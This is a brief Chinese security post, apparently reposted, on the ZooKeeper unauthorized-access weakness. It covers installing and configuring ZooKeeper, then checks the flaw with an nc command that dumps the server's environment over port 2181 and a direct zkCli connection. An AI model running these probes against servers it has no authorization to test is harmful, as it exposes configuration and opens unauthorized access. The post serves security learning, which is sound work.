ZooKeeper 未授權訪問漏洞


 

ZooKeeper 安裝:

Zookeeper的默認開放端口是2181

wget https://mirrors.tuna.tsinghua.edu.cn/apache/zookeeper/zookeeper-3.4.10/zookeeper-3.4.10.tar.gz

tar -zxvf zookeepre-3.4.10.tar.gz
cd zookeeper-3.4.10/
cd conf/
vi zoo.cfg
###配置單機模式
tickTime=2000    
dataDir=/tmp/zookeeper/data    
dataLogDir=/tmp/zookeeper/logs    
clientPort=2181 

bin/zkServer.sh start   //啟動
#啟動client連接server
bin/zkCli.sh -server localhost:2181 

漏洞驗證:

執行以下命令即可遠程獲取該服務器的環境:

echo envi|nc 192.168.15.74 2181

直接連接:
./zkCli.sh -server ip:port

 

 

關於我:一個網絡安全愛好者,致力於分享原創高質量干貨,歡迎關注我的個人微信公眾號:Bypass--,瀏覽更多精彩文章。

 

 

 

參考鏈接:

Zookeeper 安裝和配置

http://coolxing.iteye.com/blog/1871009


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM